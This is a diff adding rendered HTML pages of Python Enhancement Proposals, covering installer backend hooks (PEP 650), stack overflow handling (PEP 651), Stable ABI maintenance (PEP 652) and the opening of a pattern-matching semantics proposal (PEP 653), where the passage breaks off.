Data may also be stored in other ways as the installer backend sees +fit (e.g. separate configuration file).

+
+
+
+

Installer interface:

+

The installer interface contains mandatory and optional hooks. +Compliant installer backends MUST implement the mandatory hooks and +MAY implement the optional hooks. A universal installer MAY +implement any of the installer backend hooks itself, to act as both +a universal installer and installer backend, but this is not +required.

+

All hooks take **kwargs arbitrary parameters that a +installer backend may require that are not already specified, +allowing for backwards compatibility. If unexpected parameters are +passed to the installer backend, it should ignore them.

+

The following information is akin to the corresponding section in +PEP 517. The hooks may be called with keyword arguments, so +installer backends implementing them should be careful to make sure +that their signatures match both the order and the names of the +arguments above.

+

All hooks MAY print arbitrary informational text to stdout and +stderr. They MUST NOT read from stdin, and the +universal installer MAY close stdin before invoking the hooks.

+

The universal installer may capture stdout and/or stderr +from the backend. If the backend detects that an output stream is not +a terminal/console (e.g. not sys.stdout.isatty()), it SHOULD +ensure that any output it writes to that stream is UTF-8 encoded. +The universal installer MUST NOT fail if captured output is not +valid UTF-8, but it MAY not preserve all the information in that case +(e.g. it may decode using the replace error handler in Python). If the +output stream is a terminal, the installer backend is responsible +for presenting its output accurately, as for any program running in a +terminal.

+

If a hook raises an exception, or causes the process to terminate, +then this indicates an error.

+
+
+

Mandatory hooks:

+
+

invoke_install

+

Installs the dependencies:

+
def invoke_install(
+    path: Union[str, bytes, PathLike[str]],
+    *,
+    dependency_group: str = None,
+    **kwargs
+) -> int:
+    ...
+
+
+
    +
  • path : An absolute path where the installer backend should be +invoked from (e.g. the directory where pyproject.toml is +located).
  • +
  • dependency_group : An optional flag specifying a dependency +group that the installer backend should install. The install will +error if the dependency group doesn’t exist. A user can find all +dependency groups by calling +get_dependency_groups() if dependency groups are +supported by the installer backend.
  • +
  • **kwargs : Arbitrary parameters that a installer backend may +require that are not already specified, allows for backwards +compatibility.
  • +
  • Returns : An exit code (int). 0 if successful, any positive integer +if unsuccessful.
  • +
+

The universal installer will use the exit code to determine if the +installation is successful and SHOULD return the exit code itself.

+
+
+
+

Optional hooks:

+
+

invoke_uninstall

+

Uninstall the specified dependencies:

+
def invoke_uninstall(
+    path: Union[str, bytes, PathLike[str]],
+    *,
+    dependency_group: str = None,
+    **kwargs
+) -> int:
+    ...
+
+
+
    +
  • path : An absolute path where the installer backend should be +invoked from (e.g. the directory where pyproject.toml is +located).
  • +
  • dependency_group : An optional flag specifying a dependency +group that the installer backend should uninstall.
  • +
  • **kwargs : Arbitrary parameters that a installer backend may +require that are not already specified, allows for backwards +compatibility.
  • +
  • Returns : An exit code (int). 0 if successful, any positive integer +if unsuccessful.
  • +
+

The universal installer MUST invoke the installer backend at the +same path that the universal installer itself was invoked.

+

The universal installer will use the exit code to determine if the +uninstall is successful and SHOULD return the exit code itself.

+
+
+

get_dependencies_to_install

+

Returns the dependencies that would be installed by +invoke_install(...). This allows package upgraders +(e.g., Dependabot) to retrieve the dependencies attempting to be +installed without parsing the dependency file:

+
def get_dependencies_to_install(
+    path: Union[str, bytes, PathLike[str]],
+    *,
+    dependency_group: str = None,
+    **kwargs
+) -> Sequence[str]:
+    ...
+
+
+
    +
  • path : An absolute path where the installer backend should be +invoked from (e.g. the directory where pyproject.toml is +located).
  • +
  • dependency_group : Specify a dependency group to get the +dependencies invoke_install(...) would install for that +dependency group.
  • +
  • **kwargs : Arbitrary parameters that a installer backend may +require that are not already specified, allows for backwards +compatibility.
  • +
  • Returns: A list of dependencies (PEP 508 strings) to install.
  • +
+

If the group is specified, the installer backend MUST return the +dependencies corresponding to the provided dependency group. If the +specified group doesn’t exist, or dependency groups are not supported +by the installer backend, the installer backend MUST raise an +error.

+

If the group is not specified, and the installer backend provides +the concept of a default/unspecified group, the installer backend +MAY return the dependencies for the default/unspecified group, but +otherwise MUST raise an error.

+
+
+

get_dependency_groups

+

Returns the dependency groups available to be installed. This allows +universal installers to enumerate all dependency groups the +installer backend is aware of:

+
def get_dependency_groups(
+    path: Union[str, bytes, PathLike[str]],
+    **kwargs
+) -> AbstractSet[str]:
+    ...
+
+
+
    +
  • path : An absolute path where the installer backend should be +invoked from (e.g. the directory where pyproject.toml is +located).
  • +
  • **kwargs : Arbitrary parameters that a installer backend may +require that are not already specified, allows for backwards +compatibility.
  • +
  • Returns: A set of known dependency groups, as strings The empty set +represents no dependency groups.
  • +
+
+
+

update_dependencies

+

Outputs a dependency file based on inputted package list:

+
def update_dependencies(
+    path: Union[str, bytes, PathLike[str]],
+    dependency_specifiers: Iterable[str],
+    *,
+    dependency_group=None,
+    **kwargs
+) -> int:
+    ...
+
+
+
    +
  • path : An absolute path where the installer backend should be +invoked from (e.g. the directory where pyproject.toml is +located).
  • +
  • dependency_specifiers : An iterable of dependencies as +PEP 508 strings that are being updated, for example : +["requests==2.8.1", ...]. Optionally for a specific dependency +group.
  • +
  • dependency_group : The dependency group that the list of +packages is for.
  • +
  • **kwargs : Arbitrary parameters that a installer backend may +require that are not already specified, allows for backwards +compatibility.
  • +
  • Returns : An exit code (int). 0 if successful, any positive integer +if unsuccessful.
  • +
+
+
+
+
+

Example

+

Let’s consider implementing an installer backend that uses pip and +its requirements files for dependency groups. An implementation may +(very roughly) look like the following:

+
import subprocess
+import sys
+
+
+def invoke_install(path, *, dependency_group=None, **kwargs):
+    try:
+        return subprocess.run(
+            [
+                sys.executable,
+                "-m",
+                "pip",
+                "install",
+                "-r",
+                dependency_group or "requirements.txt",
+            ],
+            cwd=path,
+        ).returncode
+    except subprocess.CalledProcessError as e:
+        return e.returncode
+
+
+

If we named this package pep650pip, then we could specify in +pyproject.toml:

+
[install-system]
+  #Eg : pipenv
+  requires = ["pep650pip", "pip"]
+  install-backend = "pep650pip:main"
+
+
+
+
+

Rationale

+

All hooks take **kwargs to allow for backwards compatibility and +allow for tool specific installer backend functionality which +requires a user to provide additional information not required by the +hook.

+

While installer backends must be Python packages, what they do when +invoked is an implementation detail of that tool. For example, an +installer backend could act as a wrapper for a platform package +manager (e.g., apt).

+

The interface does not in any way try to specify how +installer backends should function. This is on purpose so that +installer backends can be allowed to innovate and solve problem in +their own way. This also means this PEP takes no stance on OS +packaging as that would be an installer backend’s domain.

+

Defining the API in Python does mean that some Python code will +eventually need to be executed. That does not preclude non-Python +installer backends from being used, though (e.g. mamba), as they +could be executed as a subprocess from Python code.

+
+
+

Backwards Compatibility

+

This PEP would have no impact on pre-existing code and functionality +as it only adds new functionality to a universal installer. Any +existing installer should maintain its existing functionality and use +cases, therefore having no backwards compatibility issues. Only code +aiming to take advantage of this new functionality will have +motivation to make changes to their pre existing code.

+
+
+

Security Implications

+

A malicious user has no increased ability or easier access to anything +with the addition of standardized installer specifications. The +installer that could be invoked by a universal installer via the +interface specified in this PEP would be explicitly declared by the +user. If the user has chosen a malicious installer, then invoking it +with a universal installer is no different than the user invoking +the installer directly. A malicious installer being an +installer backend doesn’t give it additional permissions or +abilities.

+
+
+

Rejected Ideas

+
+

A standardized lock file

+

A standardized lock file would solve a lot of the same problems that +specifying installer requirements would. For example, it would allow +for PaaS/IaaS to just support one installer that could read the +standardized lock file regardless of the installer that created it. +The problem with a standardized lock file is the difference in needs +between Python package installers as well as a fundamental issue with +creating reproducible environments via the lockfile (one of the main +benefits).

+

Needs and information stored in dependency files between installers +differ significantly and are dependent on installer functionality. For +example, a Python package installer such as Poetry requires +information for all Python versions and platforms and calculates +appropriate hashes while pip doesn’t. Additionally, pip would not be +able to guarantee recreating the same environment (install the exact +same dependencies) as it is outside the scope of its functionality. +This makes a standardized lock file harder to implement and makes it +seem more appropriate to make lock files tool specific.

+
+
+

Have installer backends support creating virtual environments

+

Because installer backends will very likely have a concept of virtual +environments and how to install into them, it was briefly considered +to have them also support creating virtual environments. In the end, +though, it was considered an orthogonal idea.

+
+
+
+

Open Issues

+
+

Should the dependency_group argument take an iterable?

+

This would allow for specifying non-overlapping dependency groups in +a single call, e.g. “docs” and “test” groups which have independent +dependencies but which a developer may want to install simultaneously +while doing development.

+
+
+

Is the installer backend executed in-process?

+

If the installer backend is executed in-process then it greatly +simplifies knowing what environment to install for/into, as the live +Python environment can be queried for appropriate information.

+

Executing out-of-process allows for minimizing potential issues of +clashes between the environment being installed into and the +installer backend (and potentially universal installer).

+
+
+

Enforce that results from the proposed interface feed into other parts?

+

E.g. the results from get_dependencies_to_install() and +get_dependency_groups() can be passed into invoke_install(). +This would prevent drift between the results of various parts of the +proposed interface, but it makes more of the interface required +instead of optional.

+
+
+

Raising exceptions instead of exit codes for failure conditions

+

It has been suggested that instead of returning an exit code the API +should raise exceptions. If you view this PEP as helping to translate +current installers into installer backends, then relying on exit +codes makes sense. There’s is also the point that the APIs have no +specific return value, so passing along an exit code does not +interfere with what the functions return.

+

Compare that to raising exceptions in case of an error. That could +potentially provide a more structured approach to error raising, +although to be able to capture errors it would require specifying +exception types as part of the interface.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0650.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0651/index.html b/pep-0651/index.html new file mode 100644 index 00000000000..7c30cdcfaba --- /dev/null +++ b/pep-0651/index.html @@ -0,0 +1,357 @@ + + + + + + + + PEP 651 – Robust Stack Overflow Handling | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 651 – Robust Stack Overflow Handling

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Jan-2021
+
Post-History:
+
19-Jan-2021
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected by the Python Steering Council.

+
+
+

Abstract

+

This PEP proposes that Python should treat machine stack overflow differently from runaway recursion.

+

This would allow programs to set the maximum recursion depth to fit their needs +and provide additional safety guarantees.

+

If this PEP is accepted, then the following program will run safely to completion:

+
sys.setrecursionlimit(1_000_000)
+
+def f(n):
+    if n:
+        f(n-1)
+
+f(500_000)
+
+
+

and the following program will raise a StackOverflow, without causing a VM crash:

+
sys.setrecursionlimit(1_000_000)
+
+class X:
+    def __add__(self, other):
+        return self + other
+
+X() + 1
+
+
+
+
+

Motivation

+

CPython uses a single recursion depth counter to prevent both runaway recursion and C stack overflow. +However, runaway recursion and machine stack overflow are two different things. +Allowing machine stack overflow is a potential security vulnerability, but limiting recursion depth can prevent the +use of some algorithms in Python.

+

Currently, if a program needs to deeply recurse it must manage the maximum recursion depth allowed, +hopefully managing to set it in the region between the minimum needed to run correctly and the maximum that is safe +to avoid a memory protection error.

+

By separating the checks for C stack overflow from checks for recursion depth, +pure Python programs can run safely, using whatever level of recursion they require.

+
+
+

Rationale

+

CPython currently relies on a single limit to guard against potentially dangerous stack overflow +in the virtual machine and to guard against run away recursion in the Python program.

+

This is a consequence of the implementation which couples the C and Python call stacks. +By breaking this coupling, we can improve both the usability of CPython and its safety.

+

The recursion limit exists to protect against runaway recursion, the integrity of the virtual machine should not depend on it. +Similarly, recursion should not be limited by implementation details.

+
+
+

Specification

+

Two new exception classes will be added, StackOverflow and RecursionOverflow, both of which will be +sub-classes of RecursionError

+
+

StackOverflow exception

+

A StackOverflow exception will be raised whenever the interpreter or builtin module code +determines that the C stack is at or nearing a limit of safety. +StackOverflow is a sub-class of RecursionError, +so any code that handles RecursionError will handle StackOverflow

+
+
+

RecursionOverflow exception

+

A RecursionOverflow exception will be raised when a call to a Python function +causes the recursion limit to be exceeded. +This is a slight change from current behavior which raises a RecursionError. +RecursionOverflow is a sub-class of RecursionError, +so any code that handles RecursionError will continue to work as before.

+
+
+

Decoupling the Python stack from the C stack

+

In order to provide the above guarantees and ensure that any program that worked previously +continues to do so, the Python and C stack will need to be separated. +That is, calls to Python functions from Python functions, should not consume space on the C stack. +Calls to and from builtin functions will continue to consume space on the C stack.

+

The size of the C stack will be implementation defined, and may vary from machine to machine. +It may even differ between threads. However, there is an expectation that any code that could run +with the recursion limit set to the previous default value, will continue to run.

+

Many operations in Python perform some sort of call at the C level. +Most of these will continue to consume C stack, and will result in a +StackOverflow exception if uncontrolled recursion occurs.

+
+
+

Other Implementations

+

Other implementations are required to fail safely regardless of what value the recursion limit is set to.

+

If the implementation couples the Python stack to the underlying VM or hardware stack, +then it should raise a RecursionOverflow exception when the recursion limit is exceeded, +but the underlying stack does not overflow. +If the underlying stack overflows, or is near to overflow, +then a StackOverflow exception should be raised.

+
+
+

C-API

+

A new function, Py_CheckStackDepth() will be added, and the behavior of Py_EnterRecursiveCall() will be modified slightly.

+
+

Py_CheckStackDepth()

+

int Py_CheckStackDepth(const char *where) +will return 0 if there is no immediate danger of C stack overflow. +It will return -1 and set an exception, if the C stack is near to overflowing. +The where parameter is used in the exception message, in the same fashion +as the where parameter of Py_EnterRecursiveCall().

+
+
+

Py_EnterRecursiveCall()

+

Py_EnterRecursiveCall() will be modified to call Py_CheckStackDepth() before performing its current function.

+
+
+

PyLeaveRecursiveCall()

+

Py_LeaveRecursiveCall() will remain unchanged.

+
+
+
+
+

Backwards Compatibility

+

This feature is fully backwards compatible at the Python level. +Some low-level tools, such as machine-code debuggers, will need to be modified. +For example, the gdb scripts for Python will need to be aware that there may be more than one Python frame +per C frame.

+

C code that uses the Py_EnterRecursiveCall(), PyLeaveRecursiveCall() pair of +functions will continue to work correctly. In addition, Py_EnterRecursiveCall() +may raise a StackOverflow exception.

+

New code should use the Py_CheckStackDepth() function, unless the code wants to +count as a Python function call with regard to the recursion limit.

+

We recommend that “python-like” code, such as Cython-generated functions, +use Py_EnterRecursiveCall(), but other code use Py_CheckStackDepth().

+
+
+

Security Implications

+

It will no longer be possible to crash the CPython virtual machine through recursion.

+
+
+

Performance Impact

+

It is unlikely that the performance impact will be significant.

+

The additional logic required will probably have a very small negative impact on performance. +The improved locality of reference from reduced C stack use should have some small positive impact.

+

It is hard to predict whether the overall effect will be positive or negative, +but it is quite likely that the net effect will be too small to be measured.

+
+
+

Implementation

+
+

Monitoring C stack consumption

+

Gauging whether a C stack overflow is imminent is difficult. So we need to be conservative. +We need to determine a safe bounds for the stack, which is not something possible in portable C code.

+

For major platforms, the platform specific API will be used to provide an accurate stack bounds. +However, for minor platforms some amount of guessing may be required. +While this might sound bad, it is no worse than the current situation, where we guess that the +size of the C stack is at least 1000 times the stack space required for the chain of calls from +_PyEval_EvalFrameDefault to _PyEval_EvalFrameDefault.

+

This means that in some cases the amount of recursion possible may be reduced. +In general, however, the amount of recursion possible should be increased, as many calls will use no C stack.

+

Our general approach to determining a limit for the C stack is to get an address within the current C frame, +as early as possible in the call chain. The limit can then be guessed by adding some constant to that.

+
+
+

Making Python-to-Python calls without consuming the C stack

+

Calls in the interpreter are handled by the CALL_FUNCTION, +CALL_FUNCTION_KW, CALL_FUNCTION_EX and CALL_METHOD instructions. +The code for those instructions will be modified so that when +a Python function or method is called, instead of making a call in C, +the interpreter will setup the callee’s frame and continue interpretation as normal.

+

The RETURN_VALUE instruction will perform the reverse operation, +except when the current frame is the entry frame of the interpreter +when it will return as normal.

+
+
+
+

Rejected Ideas

+

None, as yet.

+
+
+

Open Issues

+

None, as yet.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0651.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0652/index.html b/pep-0652/index.html new file mode 100644 index 00000000000..869768ef3e1 --- /dev/null +++ b/pep-0652/index.html @@ -0,0 +1,554 @@ + + + + + + + + PEP 652 – Maintaining the Stable ABI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 652 – Maintaining the Stable ABI

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Feb-2021
+
Python-Version:
+
3.10
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at C API Stability (user docs) and +Changing Python’s C API (development docs).

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

CPython’s Limited C-API and Stable ABI, introduced in PEP 384, +will be formalized in a single definitive file, tested, and documented.

+
+
+

Motivation

+

PEP 384 defined a Limited API and Stable ABI, which allow extenders and +embedders of CPython to compile extension modules that are binary-compatible +with any subsequent version of 3.x. +In theory, this brings several advantages:

+
    +
  • A module can be built only once per platform and support multiple versions +of Python, reducing time, power and maintainer attention needed for builds +(in exchange for potentially worse performance).
  • +
  • Binary wheels using the Stable ABI work with new versions of CPython +throughout the pre-release period, and can be tested in environments where +building from source is not practical.
  • +
  • As a welcome side effect of the Limited API’s hiding of implementation +details, this API is becoming a viable target for alternate Python +implementations that would be incompatible with the full C API.
  • +
+

However, in hindsight, PEP 384 and its implementation has several issues:

+
    +
  • It is ill-defined. According to PEP 384, functions are opt-out: +all functions not specially marked are part of the Stable ABI. +In practice, for Windows there’s a list that’s opt-in. +For users there is a #define that should make only the Stable ABI +available, but there is no process that ensures it is kept up-to date. +Neither is there a process for updating the documentation.
  • +
  • Until recently, the Stable ABI was not tested at all. It tends to break. +For example, changing a function to a macro can break the Stable ABI as the +function symbol is removed.
  • +
  • There is no way to deprecate parts of the Limited API.
  • +
  • It is incomplete. Some operations are not available in the Stable ABI, +with little reason except “we forgot”. +(This last point is one the PEP will not help with, however.)
  • +
+

This PEP defines the Limited API more clearly and introducess process +designed to make the Stable ABI and Limited API more useful and robust.

+
+
+

Rationale

+

This PEP contains a lot of clarifications and definitions, but just one big +technical change: the Stable ABI will be explicitly listed in +a human-maintained “manifest” file.

+

There have been efforts to collect such lists automatically, e.g. by scanning +the symbols exported from Python. +Such automation might seem easier to maintain than a handcrafted file, +but has major issues: for example, the set exported symbols has +platform-specific variations. +Also, the cost of updating an explicit manifest is small compared +to the overall work that should go into changing API that will need to +be supported forever (or until Python 3 reaches end of life, if that +comes sooner).

+

This PEP proposes automatically generating things from the manifest: +initially documentation and DLL contents, with later possibilities +for also automating tests.

+
+
+

Stable ABI vs. Limited API

+

PEP 384 and this document deal with the Limited API and the Stable ABI, +two related but distinct concepts. In short:

+
    +
  • The Stable ABI is a promise that certain extensions compiled with +CPython 3.x will be binary compatible with all subsequent versions +of CPython 3.x.
  • +
  • The Limited API is a subset of CPython’s C API that produces such extensions.
  • +
+

This section clarifies these terms and defines some of their semantics +(either pre-existing or newly proposed here).

+

The word “Extensions” is used as a shorthand for all code that uses the +Python API, e.g. extension modules or software that embeds Python.

+
+

Stable ABI

+

The CPython Stable ABI is a promise that extensions built against +a specific Stable ABI version will be compatible with any newer +interpreter of the same major version.

+

The Stable ABI does not define a complete binary interface: +important details like the layout of structures in memory or function +calling conventions are determined by the platform and the compiler and +its settings. +The Stable ABI promise only applies if these lower-details are also stable.

+

For example, an extension built with the CPython 3.10 Stable ABI will be usable +with CPython 3.11, 3.12, etc. +It will not necessarily be compatible with CPython 4.0, nor with CPython 3.10 +on a different platform.

+

The Stable ABI is not generally forward-compatible: an extension built and +tested with CPython 3.10 will not generally be compatible with CPython 3.9.

+
+

Note

+

For example, starting in Python 3.10, the Py_tp_doc slot may be set to +NULL, while in older versions, a NULL value will likely crash the +interpreter.

+
+

The Stable ABI trades performance for its stability. +For example, extensions built for a specific CPython version will automatically +use faster macros instead of functions in the Stable ABI.

+

Future Python versions may deprecate some members of the Stable ABI. +Deprecated members will still work, but may suffer from issues like reduced +performance or, in the most extreme cases, memory/resource leaks.

+
+
+

Limited API

+

The Stable ABI promise holds for extensions compiled from code that restricts +itself to the Limited API (application programming interface). +The Limited API is a subset of CPython’s C API.

+

Extensions that target the Limited API should define the preprocessor macro +Py_LIMITED_API to either 3 or the current PYTHON_API_VERSION. +This will enable Stable ABI versions of several functions and limit definitions +to the Limited API. +(However, note that the macro is not perfect: due to technical issues or +oversights, some non-limited API might be exposed even with it defined.)

+

The Limited API is not guaranteed to be stable. +In the future, parts of the Limited API may be deprecated. +They may even be removed, as long as the Stable ABI is kept +stable and Python’s general backwards compatibility policy, PEP 387, +is followed.

+
+

Note

+

For example, a function declaration might be removed from public header +files but kept in the library. +This is currently a possibility for the future; this PEP does not to propose +a concrete process for deprecations and removals.

+
+

The goal for the Limited API is to cover everything needed to interact +with the interpreter. +The main reason to not include a public API in the Limited subset +should be that it needs implementation details that change between CPython +versions (like struct memory layouts) – usually for performance reasons.

+

The Limited API is not limited to CPython. Other implementations are +encouraged to implement it and help drive its design.

+
+
+
+

Specification

+

To make the Stable ABI more useful and robust, the following changes +are proposed.

+
+

Stable ABI Manifest

+

All members of the Stable ABI – functions, typedefs, structs, data, macros, +and constants – will be explicitly listed in a single “manifest” file, +Misc/stable_abi.txt.

+

For structs, any fields that users of the Stable ABI are allowed to access +will be listed explicitly.

+

The manifest will also serve as the definitive list of the Limited API. +Members that are not part of the Limited API, but are part of the Stable ABI +(e.g. PyObject.ob_type, which is accessible by the Py_TYPE macro), +will be annotated as such.

+

For items that are only available on some systems, the manifest will record the +feature macro that determines their presence (such as MS_WINDOWS or +HAVE_FORK). +To make the implementation (and usage from non-C languages) easier, +all such macros will be simple names. +If a future item needs a “negative” macro or complex expression (such as a +hypothetical #ifndef MACOSX or #if defined(POSIX) && !defined(LINUX)), +a new feature macro will be derived.

+

The format of the manifest will be subject to change whenever needed. +It should be consumed only by scripts in the CPython repository. +If a stable list is needed, a script can be added to generate it.

+

The following will be generated from the ABI manifest:

+
    +
  • Source for the Windows shared library, PC/python3dll.c.
  • +
  • Input for documentation (see below).
  • +
  • Test case that checks the runtime availability of symbols (see below).
  • +
+

The following will be checked against the Stable ABI manifest as part of +continuous integration:

+
    +
  • The reference count summary, Doc/data/refcounts.txt, includes all +function in the Stable ABI (among others).
  • +
  • The functions/structs declared and constants/macros defined +when Python.h is included with Py_LIMITED_API set. +(Initially Linux only; checks on other systems may be added in the future.)
  • +
+

After the initial implementation, details such as function arguments will be +added and the manifest will be checked for internal consistency (e.g. all +types used in function signatures are part of the API).

+
+
+

Contents of the Stable ABI

+

The initial Stable ABI manifest will include:

+
    +
  • The Stable ABI specified in PEP 384.
  • +
  • Everything listed in PC/python3dll.c.
  • +
  • All structs (struct typedefs) which these functions return or take as +arguments. (Fields of such structs will not necessarily be added.)
  • +
  • New type slots, such as Py_am_aiter.
  • +
  • The type flags Py_TPFLAGS_DEFAULT, Py_TPFLAGS_BASETYPE, +Py_TPFLAGS_HAVE_GC, Py_TPFLAGS_METHOD_DESCRIPTOR.
  • +
  • The calling conventions METH_* (except deprecated ones).
  • +
  • All API needed by macros is the Stable ABI (annotated as not being part of +the Limited API).
  • +
+

Items that are no longer in CPython when this PEP is accepted will be removed +from the list.

+

Additional items may be added to the initial manifest according to +the checklist below.

+
+
+

Documenting the Limited API

+

Notes saying “Part of the Limited API” will be added to Python’s documentation +automatically, in a way similar to the notes on functions that return borrowed +references.

+

A complete list of all members of the Limited API will also be added to +the documentation.

+
+
+

Testing the Stable ABI

+

An automatically generated test module will be added to ensure that all symbols +included in the Stable ABI are available at compile time.

+
+
+

Changing the Limited API

+

A checklist for changing the Limited API, including adding new items to it +and removing existing ones, will be added to the Devguide. +The checklist will 1) mention best practices and common pitfalls in Python +C API design and 2) guide the developer around the files that need changing and +scripts that need running when the Limited API is changed.

+

Below is the initial proposal for the checklist. +(After the PEP is accepted, see the Devguide for the current version.)

+

Note that the checklist applies to new changes; several items +in the existing Limited API are grandfathered and couldn’t be added today.

+

Design considerations:

+
    +
  • Make sure the change does not break the Stable ABI of any version of Python +since 3.5.
  • +
  • Make sure no exposed names are private (i.e. begin with an underscore).
  • +
  • Make sure the new API is well documented.
  • +
  • Make sure the types of all parameters and return values of the added +function(s) and all fields of the added struct(s) are be part of the +Limited API (or standard C).
  • +
  • Make sure the new API and its intended use follows standard C, not just +features of currently supported platforms. +Specifically, follow the C dialect specified in PEP 7.
      +
    • Do not cast a function pointer to void* (a data pointer) or vice versa.
    • +
    +
  • +
  • Make sure the new API follows reference counting conventions. (Following them +makes the API easier to reason about, and easier use in other Python +implementations.)
      +
    • Do not return borrowed references from functions.
    • +
    • Do not steal references to function arguments.
    • +
    +
  • +
  • Make sure the ownership rules and lifetimes of all applicable struct fields, +arguments and return values are well defined.
  • +
  • Think about ease of use for the user. (In C, ease of use itself is not very +important; what is useful is reducing boilerplate code needed to use the +API. Bugs like to hide in boiler plates.)
      +
    • If a function will be often called with specific value for an argument, +consider making it default (used when NULL is passed in).
    • +
    +
  • +
  • Think about future extensions: for example, if it’s possible that future +Python versions will need to add a new field to your struct, +how will that be done?
  • +
  • Make as few assumptions as possible about details that might change in +future CPython versions or differ across C API implementations:
    +
      +
    • The GIL
    • +
    • Garbage collection
    • +
    • Memory layout of PyObject, lists/tuples and other structures
    • +
    +
    +
  • +
+

If following these guidelines would hurt performance, add a fast function +(or macro) to the non-limited API and a stable equivalent to the Limited API.

+

If anything is unclear, or you have a good reason to break the guidelines, +consider discussing the change at the capi-sig mailing list.

+

Procedure:

+
    +
  • Move the declaration to a header file directly under Include/, into a +#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03yy0000 block +(with the yy corresponding to the target CPython version).
  • +
  • Make an entry in the Stable ABI manifest, Misc/stable_abi.txt.
  • +
  • Regenerate the autogenerated files using make regen-all. +(or the alternative for non-make platforms)
  • +
  • Build Python and run checks using make check-abi. +(or the alternative for non-make platforms)
  • +
+
+
+

Advice for Extenders and Embedders

+

The following notes will be added to documentation, along with better +information regarding this topic and what guarantees do we offer:

+

Extension authors should test with all Python versions they support, +and preferably build with the lowest such version.

+

Compiling with Py_LIMITED_API defined is not a guarantee that your code +conforms to the Limited API or the Stable ABI. +Py_LIMITED_API only covers definitions, but an API also includes other +issues, such as expected semantics.

+

Examples of issues that Py_LIMITED_API does not guard against are:

+
    +
  • Calling a function with invalid arguments
  • +
  • A function that started accepting NULL values for an argument +in Python 3.9 will fail if NULL is passed to it under Python 3.8. +Only testing with 3.8 (or lower versions) will uncover this issue.
  • +
  • Some structs include a few fields that are part of the Stable ABI and other +fields that aren’t. +Py_LIMITED_API does not filter out such “private” fields.
  • +
  • Code that uses something that is not documented as part of the Stable ABI, +but exposed even with Py_LIMITED_API defined, may break in the future. +Despite the team’s best efforts, such issues may happen.
  • +
+
+
+

Note for Redistributors of Python

+

The Stable ABI promise relies on stable underlying ABI details, such as the +layout of structures in memory and function calling conventions, which +are affected by the compiler and its settings. +For the promise to hold, these details must not change between CPython 3.x +releases on a particular platform.

+
+
+
+

Backwards Compatibility

+

Backwards compatibility is one honking great idea!

+

This PEP aims at full compatibility with the existing Stable ABI and Limited +API, but defines them terms more explicitly. +It might not be consistent with some interpretations of what the existing +Stable ABI/Limited API is.

+
+
+

Security Implications

+

None known.

+
+
+

How to Teach This

+

Technical documentation will be provided in Doc/c-api/stable +and linked from the What’s New document. +Docs for CPython core developers will be added to the devguide.

+
+
+

Reference Implementation

+

See issue 43795.

+
+
+

Ideas for the Future

+

The following issues are out of scope of this PEP, but show possible +future directions.

+
+

Defining a process for deprecations/removals

+

While this PEP acknowledges that parts of the Limited API might be deprecated +or removed in the future, a process to do this is not in scope, and is left +to a possible future PEP.

+
+
+

C syntax for the ABI manifest

+

It might be useful to have the ABI manifest be a C header file, or to +generate header files from the manifest. +Again, either are options for the future.

+
+
+
+

Open Issues

+

None so far.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0652.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0653/index.html b/pep-0653/index.html new file mode 100644 index 00000000000..66397d29ec5 --- /dev/null +++ b/pep-0653/index.html @@ -0,0 +1,1045 @@ + + + + + + + + PEP 653 – Precise Semantics for Pattern Matching | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 653 – Precise Semantics for Pattern Matching

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
09-Feb-2021
+
Post-History:
+
18-Feb-2021
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a semantics for pattern matching that respects the general concept of PEP 634, +but is more precise, easier to reason about, and should be faster.

+

The object model will be extended with two special (dunder) attributes, __match_container__ and +__match_class__, in addition to the __match_args__ attribute from PEP 634, to support pattern matching. +Both of these new attributes must be integers and __match_args__ is required to be a tuple of unique strings.

+

With this PEP:

+
    +
  • The semantics of pattern matching will be clearer, so that patterns are easier to reason about.
  • +
  • It will be possible to implement pattern matching in a more efficient fashion.
  • +
  • Pattern matching will be more usable for complex classes, by allowing classes some more control over which patterns they match.
  • +
+
+
+

Motivation

+

Pattern matching in Python, as described in PEP 634, is to be added to Python 3.10. +Unfortunately, PEP 634 is not as precise about the semantics as it could be, +nor does it allow classes sufficient control over how they match patterns.

+
+

Precise semantics

+

PEP 634 explicitly includes a section on undefined behavior. +Large amounts of undefined behavior may be acceptable in a language like C, +but in Python it should be kept to a minimum. +Pattern matching in Python can be defined more precisely without losing expressiveness or performance.

+
+
+

Improved control over class matching

+

PEP 634 delegates the decision over whether a class is a sequence or mapping to collections.abc. +Not all classes that could be considered sequences are registered as subclasses of collections.abc.Sequence. +This PEP allows them to match sequence patterns, without the full collections.abc.Sequence machinery.

+

